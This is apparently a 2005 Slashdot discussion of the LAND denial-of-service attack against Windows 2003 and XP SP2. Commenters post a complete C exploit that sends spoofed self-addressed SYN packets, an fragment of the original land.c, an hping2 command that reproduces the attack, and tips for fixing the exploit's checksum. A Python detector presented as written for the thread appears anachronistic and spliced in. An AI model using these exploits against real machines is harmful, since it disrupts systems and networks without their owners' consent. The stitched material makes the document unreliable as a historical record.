
Windows 2003 and XP SP2 Vulnerable To LAND Attack

An anonymous reader writes "Dejan Levaja, a Serbian security engineer, has discovered that nearly 8 years after the attack was first made public, Windows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this to work, but there's a whole lotta machines that don't have it turned on.
  • Re:Only win ? (Score:5, Informative)

    by redJag ( 662818 ) on Monday March 07, 2005 @12:22PM (#11865952)
    There is a big list before the provided source code [hoobie.net].
  • by fizbin ( 2046 ) <martin@s[ ]plow.org ['now' in gap]> on Monday March 07, 2005 @12:27PM (#11866008) Homepage
    Quoting from http://www.insecure.org/sploits/land.ip.DOS.html [insecure.org]:
    i recently discovered a bug which freezes win95 boxes. here's how
    it works: send a spoofed packet with the SYN flag set from a host, on an open
    port (such as 113 or 139), setting as source the SAME host and port
    (ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock
    up.
    So it's a way to either remotely lock up or reboot a target machine. I would assume (not having, you know, tried it or anything) that this includes most windows-based webservers.
  • Re:News? (Score:5, Informative)

    by InsaneGeek ( 175763 ) <slashdot@RABBITi ... minus herbivore> on Monday March 07, 2005 @12:32PM (#11866090) Homepage
    The LAND attack requires an open port, so by definition if the system isn't running any services it will have no open ports and not be vulnerable to this attack.
  • Two things of note: (Score:2, Informative)

    by AceJohnny ( 253840 ) <jlargentaye&gmail,com> on Monday March 07, 2005 @12:35PM (#11866127) Journal
    WTF is a LAND attack? From the source:
    "LAND attack:
    Sending TCP packet with SYN flag set, source and destination IP address and source and destination port as of destination machine, results in 15-30 seconds DoS condition."
    If I understand correctly, this means the vulnerable machine will attempt to synchronise a connection with itself?

    I find this quote enlightening:
    "Ethic:
    Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received, so I decided to share this info with security community. "

    So the vulnerability was made public. So exploits are going to be made. However, if Microsoft, who claim to have shifted more focus to security issues, had even acknowledged this report, the vulnerability wouldn't have become public so soon without a patch.
    Kinda worries you about the way computer security is handled, doesn't it?
  • by bluelip ( 123578 ) on Monday March 07, 2005 @12:40PM (#11866203) Homepage Journal
    Grab a copy of hping2 and try:

    hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd

    Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test

  • MOD PARENT UP ! (Score:4, Informative)

    by mirko ( 198274 ) on Monday March 07, 2005 @12:40PM (#11866205) Journal
    BSDI 2.1 (vanilla) IS vulnerable
    BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
    BSDI 3.0 NOT vulnerable
    Digital UNIX 4.0 NOT vulnerable
    FreeBSD 2.2.2-RELEASE IS vulnerable
    FreeBSD 2.2.5-RELEASE IS vulnerable
    FreeBSD 2.2.5-STABLE IS vulnerable
    FreeBSD 3.0-CURRENT IS vulnerable
    HP-UX 10.20 IS vulnerable
    IRIX 6.2 NOT vulnerable
    Linux 2.0.30 NOT vulnerable
    Linux 2.0.32 NOT vulnerable
    MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
    NetBSD 1.2 IS vulnerable
    NeXTSTEP 3.0 IS vulnerable
    NeXTSTEP 3.1 IS vulnerable
    Novell 4.11 NOT vulnerable
    OpenBSD 2.1 IS vulnerable
    OpenBSD 2.2 (Oct31) NOT vulnerable
    SCO OpenServer 5.0.4 NOT vulnerable
    Solaris 2.5.1 IS vulnerable (conflicting reports)
    SunOS 4.1.4 IS vulnerable
    Windows 95 (vanilla) IS vulnerable
    Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable
  • by __aaijsn7246 ( 86192 ) on Monday March 07, 2005 @12:45PM (#11866281)
    Security through obscurity doesn't work. Here's the important part of the source :) Basically it just sends a SYN packet which has the target's address as the source and the destination (same port as well).

    ---snip---
    bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->version=4;
    ipheader->ihl=sizeof(struct iphdr)/4;
    ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->id=htons(0xF1C);
    ipheader->ttl=255;
    ipheader->protocol=IP_TCP;
    ipheader->saddr=sin.sin_addr.s_addr;
    ipheader->daddr=sin.sin_addr.s_addr;

    tcpheader->th_sport=sin.sin_port;
    tcpheader->th_dport=sin.sin_port;
    tcpheader->th_seq=htonl(0xF1C);
    tcpheader->th_flags=TH_SYN;
    tcpheader->th_off=sizeof(struct tcphdr)/4;
    tcpheader->th_win=htons(2048);

    bzero(&pseudoheader,12+sizeof(struct tcphdr));
    pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.protocol=6;
    pseudoheader.length=htons(sizeof(struct tcphdr));
    bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
    tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
    ---snip---
  • by Tethys_was_taken ( 813654 ) on Monday March 07, 2005 @12:48PM (#11866316) Homepage
    Found inside the source file:
    Date: Thu, 20 Nov 1997 19:40:19 -0500
    Reply-To: m3lt <meltman@LAGGED.NET>
    Subject: new TCP/IP bug in win95

    hi,

    i recently discovered a bug which freezes win95 boxes. here's how
    it works: send a spoofed packet with the SYN flag set from a host, on an open
    port (such as 113 or 139), setting as source the SAME host and port
    (ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock
    up.

    the piece of code included in this message does that, so... have fun!

    i haven't tested this bug on other platforms, i don't have the
    resources. please feel free to do so.

    m3lt
    meltman@lagged.net
  • Exploit (Score:1, Informative)

    by Anonymous Coward on Monday March 07, 2005 @12:56PM (#11866427)
    Courtesy of the fine (French) folk at k-otik.org... an exploit [k-otik.com]. Curse this slashcode lameness filter...

    #define _BSD_SOURCE
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    /* Windows Server 2003 and XP SP2 remote DoS exploit
       Tested under OpenBSD 3.6 at WinXP SP 2
       Vuln by Dejan Levaja
       (c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
       Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
       Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy
       All rights reserved. */
    //checksum function by r0ach
    u_short checksum (u_short *addr, int len)
    {
      u_short *w = addr;
      int i = len;
      int sum = 0;
      u_short answer;
      while (i > 0) {
        sum += *w++;
        i-=2;
      }
      if (i == 1)
        sum += *(u_char *)w;
      sum = (sum >> 16) + (sum & 0xffff);
      sum = sum + (sum >> 16);
      return (~sum);
    }
    int main(int argc, char ** argv)
    {
      struct in_addr src, dst;
      struct sockaddr_in sin;
      struct _pseudoheader {
        struct in_addr source_addr;
        struct in_addr destination_addr;
        u_char zero;
        u_char protocol;
        u_short length;
      } pseudoheader;
      struct ip * iph;
      struct tcphdr * tcph;
      int mysock;
      u_char * packet;
      u_char * pseudopacket;
      int on = 1;
      if( argc != 3) {
        fprintf(stderr, "r57windos.c by __blf\n");
        fprintf(stderr, "RusH Security Team\n");
        fprintf(stderr, "Usage: %s \n", argv[0]);
        return EX_USAGE;
      }
      if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL) {
        perror("malloc()\n");
        return EX_OSERR;
      }
      inet_aton(argv[1], &src);
      inet_aton(argv[1], &dst);
      iph = (struct ip *) packet;
      iph->ip_v = IPVERSION;
      iph->ip_hl = 5;
      iph->ip_tos = 0;
      iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
      iph->ip_off = htons(IP_DF);
      iph->ip_ttl = 255;
      iph->ip_p = IPPROTO_TCP;
      iph->ip_sum = 0;
      iph->ip_src = src;
      iph->ip_dst = dst;
      tcph = (struct tcphdr *)(packet +sizeof(struct ip));
      tcph->th_sport = htons(atoi(argv[2]));
      tcph->th_dport = htons(atoi(argv[2]));
      tcph->th_seq = ntohl(rand());
      tcph->th_ack = rand();
      tcph->th_off = 5;
      tcph->th_flags = TH_SYN; // setting up TCP SYN flag here
      tcph->th_win = htons(512);
      tcph->th_sum = 0;
      tcph->th_urp = 0;
      pseudoheader.source_addr = src;
      pseudoheader.destination_addr = dst;
      pseudoheader.zero = 0;
      pseudoheader.protocol = IPPROTO_TCP;
      pseudoheader.length = htons(sizeof(struct tcphdr));
      if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) {
        perror("malloc()\n");
        return EX_OSERR;
      }
      memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
      memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
      tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));
      mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
      if(!mysock) {
        perror("socket!\n");
        return EX_OSERR;
      }
      if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) {
        perror("setsockopt");
        shutdown(mysock, 2);
        return EX_OSERR;
      }
      sin.sin_family = PF_INET;
      sin.sin_addr = dst;
      sin.sin_port = htons(80);
      if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        perror("sendto()\n");
        shutdown(mysock, 2);
        return EX_OSERR;
      }
      printf("Packet sent. Remote machine should be down.\n");
      shutdown(mysock, 2);
      return EX_OK;
    }
  • by bluelip ( 123578 ) on Monday March 07, 2005 @01:08PM (#11866578) Homepage Journal
    On my XP box w/ SP2 + no firewall:
    for up to 30 seconds after the attack , I can move the mouse, but cannot click on anything.

    All network activity stops during that time also.

  • by bluelip ( 123578 ) on Monday March 07, 2005 @01:11PM (#11866633) Homepage Journal
    The problem might be w/ your code.

    A test listed in an above comment of mine worked for my box. DL hping2 and try:

    hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd

    Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test

  • by XorNand ( 517466 ) on Monday March 07, 2005 @01:18PM (#11866705)
    Yeah, that's the Simple File Sharing "feature" of XP Home Edition. Enabled by default, it can be annoying if you're used to doing things the "old way" (user friendly, but expert hostile). Just use this KB article [microsoft.com] to turn it off.
  • exploit (Score:5, Informative)

    by imipak ( 254310 ) on Monday March 07, 2005 @01:32PM (#11866888) Journal
    Courtesy of the fine (French) folk at k-otik.org... an exploit [k-otik.com].

    Unfortunately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?

  • Re:wow (Score:2, Informative)

    by runderwo ( 609077 ) * <runderwoNO@SPAMmail.win.org> on Monday March 07, 2005 @01:40PM (#11867008)
    Open Source solutions are so much better because they get the fixes out so much faster?
    No. OSS solutions are better because they get the fixes out faster to people who are willing to do their own QA. The key here is that the user has a choice whether to wait for their vendor to release a QA'd fix, or to choose to install the fix themselves because they know no regression will affect them as much as the window of vulnerability would. You don't have that choice as you wait for a proprietary vendor to lumber along on its own schedule to get the patch out the door.
  • by prisoner-of-enigma ( 535770 ) on Monday March 07, 2005 @01:40PM (#11867017) Homepage
    Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.

    OK, so what you're saying is that in order for XP to be vulnerable, it must be directly connected to the Internet, the user must specifically have disabled the firewall, and no intermediate firewall must be present.

    At what point do we cease blaming Microsoft for stupid user tricks? I mean, Microsoft has freely given SP2 to anyone who wants it. Pretty soon it will be a mandatory download from WindowsUpdate. People bitched and moaned for years that Microsoft didn't do enough for security and didn't default to having updates apply automatically. But when Microsoft finally does improve security (with a better firewall) and tries to turn it all on by default, everyone griped. Damned if you do...

    Look, if a Windows zealot took something like Fedora, turned on a bunch of services, turned off the firewall, and then griped because his box got hacked, Slashdotters everywhere would be screaming that this guy was a fool, that Linux security is great when it's not sabotaged by an idiot at the keyboard. And they'd be right. But when an attack requires that a Windows user actively subvert the very security measures Microsoft's put in place to protect him, everybody blames Microsoft. Nope, no bias to see here, citizens, please move along.
  • Ho hum (Score:3, Informative)

    by mogrify ( 828588 ) on Monday March 07, 2005 @01:46PM (#11867084) Homepage
    I hit a Windows XP SP1 box with this to no effect. I had to make some changes to even compile it (http://mixter.void.ru/glibc.txt [mixter.void.ru]). But the test box didn't blink.
  • by Anonymous Coward on Monday March 07, 2005 @01:53PM (#11867182)
    Sorry, I am the same anonymous coward replying to myself. It does affect at least SP2; as someone mentioned above, icons cannot be clicked for 30 seconds, and similarly ping stops working during that time period. Afterwards it goes back to normal, so it doesn't crash it, but it does affect it somehow.
  • by Anonymous Coward on Monday March 07, 2005 @02:46PM (#11867787)
    Doesn't look like it worked on my win2k3 server. Also tried it on an XP box as well; it just gives me

    [send_ip]sendto: 10004

    which I have no idea if it works or not, because I never used this before.
  • Re:Only win ? (Score:5, Informative)

    by ip_fired ( 730445 ) on Monday March 07, 2005 @03:22PM (#11868211) Homepage
    I found some interesting things while playing around with this.

    1st: The checksum code is always off by 3 in that file. Subtract 3 from the value before you take the complement and it'll be right. (this is a kludge, I haven't taken the time to actually figure out why it's wrong yet)

    2nd: It causes 100% CPU usage on a WinXP SP2 box for about 3 seconds for each packet sent!!!

    3rd: It can be blocked (and probably IS blocked) by most routers since the source and destination addresses are the same.

    I got permission to send one of these packets to my friend's Win2003 box and as far as we can tell, it didn't do anything. I don't know if the packet is getting through though.

    4th: Also, I retested the Mac, and again, the malformed packet did nothing.
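The definition AceJohnny quotes above (a SYN whose source and destination address and port all belong to the target) and ip_fired's point that routers can drop these packets simply because source and destination addresses match both reduce to a small filter rule. The Python below is an added example written for this thread, not code from any of the posts or from the linked advisories: it parses raw IPv4/TCP headers, validates the IP header checksum, and classifies each packet. The packet builder only produces byte strings for the detector to inspect (nothing is written to a socket), and every address and port in it is a constructed sample value.

```python
"""Classifier for LAND-style TCP segments (added example, constructed data)."""
import struct
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import Optional

TH_SYN = 0x02  # TCP SYN flag bit


@dataclass
class ParsedSegment:
    src: str
    dst: str
    sport: int
    dport: int
    flags: int


def internet_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement checksum. Over a header whose checksum
    field is already filled in correctly the result is 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_tcp(pkt: bytes) -> Optional[ParsedSegment]:
    """Extract addresses, ports and TCP flags from a raw IPv4/TCP packet.
    Returns None for anything that is not well-formed IPv4 carrying TCP."""
    if len(pkt) < 20:
        return None
    (ver_ihl, _tos, _tot_len, _ident, _frag, _ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(pkt) < ihl + 20:
        return None
    if proto != 6 or internet_checksum(pkt[:ihl]) != 0:
        return None  # not TCP, or the IP header is corrupt
    sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", pkt[ihl:ihl + 14])
    return ParsedSegment(str(IPv4Address(src)), str(IPv4Address(dst)),
                         sport, dport, off_flags & 0x01FF)


def classify(pkt: bytes) -> str:
    """'land' for a SYN whose source and destination address and port all
    match; 'self-addressed' for any other packet with src == dst (spoofed
    if seen on an external interface); 'ok' for everything else."""
    seg = parse_ipv4_tcp(pkt)
    if seg is None:
        return "not-ipv4-tcp"
    if seg.src == seg.dst:
        if seg.flags & TH_SYN and seg.sport == seg.dport:
            return "land"
        return "self-addressed"
    return "ok"


def is_land_packet(pkt: bytes) -> bool:
    return classify(pkt) == "land"


def build_sample(src: str, dst: str, sport: int, dport: int, flags: int) -> bytes:
    """Construct a minimal 40-byte IPv4+TCP header pair as detector input.
    Only the IP header checksum is filled in; the TCP checksum stays zero.
    This is test data for the classifier and is never sent anywhere."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, 2048, 0, 0)
    ip = bytearray(struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x0F1C,
                               0, 255, 6, 0, IPv4Address(src).packed,
                               IPv4Address(dst).packed))
    ip[10:12] = struct.pack("!H", internet_checksum(bytes(ip)))
    return bytes(ip) + tcp


if __name__ == "__main__":
    # Constructed sample traffic; the addresses and ports are made up.
    samples = {
        "land":    build_sample("10.0.0.1", "10.0.0.1", 139, 139, TH_SYN),
        "normal":  build_sample("10.0.0.2", "10.0.0.1", 40000, 139, TH_SYN),
        "same ip": build_sample("10.0.0.1", "10.0.0.1", 40000, 139, TH_SYN),
    }
    for name, pkt in samples.items():
        print("%-8s -> %s" % (name, classify(pkt)))
```

The checksum check matters for the point ip_fired raises: a packet with a bad IP header checksum is dropped by the stack before any of the LAND logic runs, so a detector that ignores it will count packets the target never saw. The `self-addressed` class is the broader rule a border router applies (source address equal to destination address is never legitimate on an external interface), which is why the narrower LAND signature rarely needs to be matched there.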
  • Re:UNLABELED too. (Score:1, Informative)

    by Anonymous Coward on Tuesday March 08, 2005 @06:52AM (#11875491)
    You're a dork.

    If you can't think of 100 good reasons why a security professional or curious sysadmin would want a copy of this code, which, I'll note, has been around in this form for almost 8 years (to the point where it won't even COMPILE on a modern system), then you should put your computer back in its box and ring UPS to get it shipped back to the manufacturer, because you are too stupid to own it.

    To elaborate, because you're obviously not so quick on the uptake; 'there is nothing inherently wrong with possessing a tool.' To elaborate further, this snippet of code can be used to verify that any vendor-supplied patch does, in fact, do what it says, amongst other things.

    Think before spouting your mouth off. Your post espouses all of the bad ideas behind laws such as the DMCA. With people like you doing the thinking, is it little wonder that such laws get passed?
